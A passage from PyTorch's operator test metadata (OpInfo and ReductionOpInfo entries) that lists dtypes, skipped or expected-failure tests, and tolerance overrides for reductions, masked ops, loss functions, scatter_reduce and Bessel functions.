promotes_int_to_int64=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, dtypes=all_types_and_complex_and(torch.bool), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_prod, ref=reference_reduction_numpy(np.prod), skips=( # FIXME: prod does not support passing keepdim without passing dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: prod reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: prod does not support passing None to dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16, torch.complex64]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values', dtypes=[torch.uint8, torch.float16, torch.complex64]), ), ), ReductionOpInfo( 'sum', identity=0, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_int64=True, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), ref=reference_reduction_numpy(np.sum), skips=( # FIXME: sum does not support passing keepdim without passing dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: sum does not support passing None to dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values', dtypes=[torch.float16]), ), ), ReductionOpInfo( 'nansum', identity=0, nan_policy='omit', supports_out=True, promotes_int_to_int64=True, dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.nansum), skips=( # FIXME: nansum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: flaky test so skipped instead of xfailed # possibly bad low precision reference in numpy DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), ), ), ReductionOpInfo( '_masked.sum', ref=reference_reduction_numpy(np.sum), method_variant=None, identity=0, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, promotes_int_to_int64=True, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.skip("Failing on some jobs"), 'TestReductions', 'test_reference_masked', dtypes=(torch.bool, torch.int8, torch.int16, torch.int32)), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.bfloat16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-03)}), 'TestReductions', 'test_ref_small_input'), ], sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, sample_inputs_sparse_csr_func=sample_inputs_sparse_csr_masked_reduction ), ReductionOpInfo( '_masked.prod', ref=reference_reduction_numpy(np.prod), method_variant=None, identity=1, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, promotes_int_to_int64=True, # FIXME: "prod_cpu" not implemented for 'BFloat16' # FIXME: "prod_cpu" not implemented for 'Half' dtypes=all_types_and_complex_and(torch.bool), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Failing on some jobs"), 'TestReductions', 'test_reference_masked', dtypes=(torch.bool, torch.int8, torch.int16, torch.int32),), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), # FIXME: "cuda_scatter_gather_base_kernel_func" not implemented for ... (used for sparse_coo inputs) DecorateInfo(unittest.skip("Skipped!"), 'TestMasked', 'test_mask_layout', device_type='cuda', dtypes=(torch.bool, torch.int8, torch.uint8, torch.int16, torch.int32, torch.int64, torch.complex64, torch.complex128)), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-02)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_ref_duplicate_values'), ], sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, sample_inputs_sparse_csr_func=sample_inputs_sparse_csr_masked_reduction, ), OpInfo( '_masked.cumsum', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), method_variant=None, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # NotSupportedError: Compiled functions can't ... use keyword-only arguments with defaults DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), # Can reuse the same inputs; dim is required in both sample_inputs_func=sample_inputs_masked_cumops, gradcheck_wrapper=gradcheck_wrapper_masked_operation, ), OpInfo( '_masked.cumprod', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), method_variant=None, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # NotSupportedError: Compiled functions can't ... use keyword-only arguments with defaults DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), # Can reuse the same inputs; dim is required in both sample_inputs_func=sample_inputs_masked_cumops, gradcheck_wrapper=gradcheck_wrapper_masked_operation, ), ReductionOpInfo( '_masked.amax', nan_policy='propagate', supports_out=False, dtypes=all_types_and(torch.float16, torch.bfloat16), supports_sparse=True, ref=reference_reduction_numpy(np.amax), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: amax reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: Unknown builtin op: aten::iinfo DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # FIXME: "cuda_scatter_gather_base_kernel_func" not implemented for ... (used for sparse_coo inputs) DecorateInfo(unittest.skip("Skipped!"), 'TestMasked', 'test_mask_layout', device_type='cuda', dtypes=(torch.bool, torch.int8, torch.uint8, torch.int16, torch.int32, torch.int64, torch.complex64, torch.complex128)), ), sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.amin', nan_policy='propagate', supports_out=False, dtypes=all_types_and(torch.float16, torch.bfloat16), supports_sparse=True, ref=reference_reduction_numpy(np.amin), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: amax reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: Unknown builtin op: aten::iinfo DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # FIXME: "cuda_scatter_gather_base_kernel_func" not implemented for ... (used for sparse_coo inputs) DecorateInfo(unittest.skip("Skipped!"), 'TestMasked', 'test_mask_layout', device_type='cuda', dtypes=(torch.bool, torch.int8, torch.uint8, torch.int16, torch.int32, torch.int64, torch.complex64, torch.complex128)), ), sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.argmax', supports_out=False, supports_multiple_dims=False, supports_autograd=False, dtypes=all_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.argmax, supports_keepdims=False), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # initial is not a keyword for argmax DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_reference_masked'), # NotSupportedError: Compiled functions can't ... use keyword-only arguments with defaults DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), ), sample_inputs_func=sample_inputs_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.argmin', supports_out=False, supports_multiple_dims=False, supports_autograd=False, dtypes=all_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.argmin, supports_keepdims=False), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # initial is not a keyword for argmin DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_reference_masked'), # NotSupportedError: Compiled functions can't ... use keyword-only arguments with defaults DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), ), sample_inputs_func=sample_inputs_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.mean', ref=reference_reduction_numpy(np.mean) if np.lib.NumpyVersion(np.__version__) >= '1.20.2' else None, method_variant=None, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16, torch.bool), skips=( DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_ref_duplicate_values', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_reference_masked', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_ref_small_input', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), ], sample_inputs_func=sample_inputs_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), OpInfo( '_masked.median', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), method_variant=None, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # NotSupportedError: Compiled functions can't ... use keyword-only arguments with defaults DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), sample_inputs_func=sample_inputs_masked_softmax, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.norm', identity=0, method_variant=None, nan_policy='propagate', supports_out=False, promotes_int_to_float=True, dtypes=floating_types_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # torch.jit.frontend.NotSupportedError: Compiled functions # can't take variable number of arguments or use # keyword-only arguments with defaults DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_masked_norm, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.var', ref=reference_reduction_numpy(np.var) if np.lib.NumpyVersion(np.__version__) >= '1.20.2' else None, method_variant=None, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02), torch.bfloat16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestReductions', 'test_ref_small_input'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestMasked', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ], sample_inputs_func=sample_inputs_masked_std_var, gradcheck_wrapper=gradcheck_wrapper_masked_operation, check_batched_grad=True, check_batched_forward_grad=True, ), ReductionOpInfo( '_masked.std', ref=reference_reduction_numpy(np.std) if np.lib.NumpyVersion(np.__version__) >= '1.20.2' else None, method_variant=None, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.float16,)), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestReductions', 'test_ref_small_input'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestMasked', 'test_reference_masked'), ], sample_inputs_func=sample_inputs_masked_std_var, gradcheck_wrapper=gradcheck_wrapper_masked_operation, check_batched_grad=True, check_batched_forward_grad=True, ), OpInfo( '_masked.softmax', method_variant=None, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_softmax, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_out=False), OpInfo( '_masked.log_softmax', method_variant=None, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_softmax, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.bfloat16: tol(atol=1e-02, rtol=1e-02)}), 'TestMasked', 'test_reference_masked'), ], gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_out=False), OpInfo( '_masked.softmin', method_variant=None, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_softmax, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_out=False), OpInfo( '_masked.normalize', method_variant=None, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_normalize, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Prexisting issue with linalg.vector_norm DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), # RuntimeError: "clamp_min_cpu" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestMasked', 'test_reference_masked', device_type='cpu', dtypes=[torch.half]), ), gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo( "nn.functional.ctc_loss", ref=_NOTHING, dtypes=floating_types(), supports_out=False, sample_inputs_func=sample_inputs_ctc_loss, skips=( # https://github.com/pytorch/pytorch/issues/67462 # torch.autograd.gradcheck.GradcheckError: Jacobian mismatch for output 0 with respect to input 0 DecorateInfo( unittest.expectedFailure, "TestGradients", "test_fn_grad", dtypes=(torch.float64,), ), # RuntimeError: derivative for aten::_ctc_loss_backward is not implemented DecorateInfo( unittest.expectedFailure, "TestGradients", "test_fn_gradgrad", dtypes=(torch.float64,), ), # RuntimeError: derivative for aten::_ctc_loss_backward is not implemented DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,), ), # Operation calls data_ptr() somewhere; needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), ), ), OpInfo( "nn.functional.cosine_embedding_loss", ref=_NOTHING, dtypes=all_types_and(torch.bfloat16, torch.bool), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_cosine_embedding_loss, ), OpInfo( "nn.functional.nll_loss", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_nll_loss, supports_forward_ad=True, assert_jit_shape_analysis=True, skips=( # RuntimeError: # undefined value tensor: # File "<string>", line 3 # def the_method(i0, i1): # return torch.nn.functional.nll_loss(i0, i1, weight=tensor([8.4784, 1.7658, 4.3228], dtype=torch.float32)) # ~~~~~~ <--- HERE DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ), ), OpInfo( "nn.functional.gaussian_nll_loss", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_gaussian_nll_loss, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, # please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ), decorators=( DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ) ), OpInfo( "nn.functional.hinge_embedding_loss", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_hinge_embedding_loss, error_inputs_func=error_inputs_hinge_embedding_loss, reference_inputs_func=reference_inputs_hinge_embedding_loss, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ) ), OpInfo( "nn.functional.huber_loss", aten_backward_name='huber_loss_backward', ref=_NOTHING, dtypes=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, sample_inputs_func=sample_inputs_huber_loss, skips=( # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, # please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ) ), OpInfo( "nn.functional.pdist", ref=reference_pdist, sample_inputs_func=sample_inputs_pdist, dtypes=floating_types(), supports_out=False, supports_gradgrad=False), OpInfo( "nn.functional.poisson_nll_loss", ref=_NOTHING, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_poisson_nll_loss, ), OpInfo( "argsort", dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_argsort, supports_out=False, supports_autograd=False, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,), ), ), ), OpInfo( "repeat_interleave", dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_repeat_interleave, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), ), ), OpInfo( "nn.functional.pairwise_distance", ref=lambda a, b, p=2.0, eps=1e-6, keepdim=False: ( np.sum(np.abs(a - b + eps) ** p, axis=-1, keepdims=keepdim) ** (1 / p) ), sample_inputs_func=sample_inputs_pairwise_distance, dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), ), ), OpInfo( "nn.functional.pixel_shuffle", sample_inputs_func=sample_inputs_pixel_shuffle, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), ), ), OpInfo( "nn.functional.pixel_unshuffle", sample_inputs_func=sample_inputs_pixel_unshuffle, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), ), ), OpInfo( "nn.functional.kl_div", sample_inputs_func=sample_inputs_kl_div, dtypes=floating_types_and(torch.bfloat16, torch.int8, torch.int16, torch.int32, torch.int64), backward_dtypes=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64), dtypesIfCUDA=floating_types_and( torch.float16, torch.bfloat16, torch.int8, torch.int16, torch.int32, torch.int64 ), backward_dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16, torch.int8, torch.int16, torch.int32, torch.int64), supports_out=False, check_batched_grad=False, supports_forward_ad=True, skips=( # See https://github.com/pytorch/pytorch/issues/65466 DecorateInfo( unittest.expectedFailure, "TestGradients", "test_fn_gradgrad", ), ), ), OpInfo( "diagflat", ref=lambda input, offset=0: np.diagflat(input, k=offset), sample_inputs_func=sample_inputs_diagflat, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo( 'scatter_reduce', variant_test_name='sum', # complex not added to dtypes as complex gradients are not properly handled # and scatter_reduce hasn't been added to the whitelist in gen_variable_type yet dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='prod', # complex not added to dtypes as complex gradients are not properly handled # and scatter_reduce hasn't been added to the whitelist in gen_variable_type yet dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='mean', # complex not added to dtypes as complex gradients are not properly handled # and scatter_reduce hasn't been added to the whitelist in gen_variable_type yet dtypes=all_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='amin', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='amax', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), UnaryUfuncInfo( 'special.bessel_j0', decorators=( precisionOverride( { torch.float32: 1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.j0 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.bessel_j1', decorators=( precisionOverride( { torch.float32: 1e-04, torch.float64: 1e-05, }, ), ), 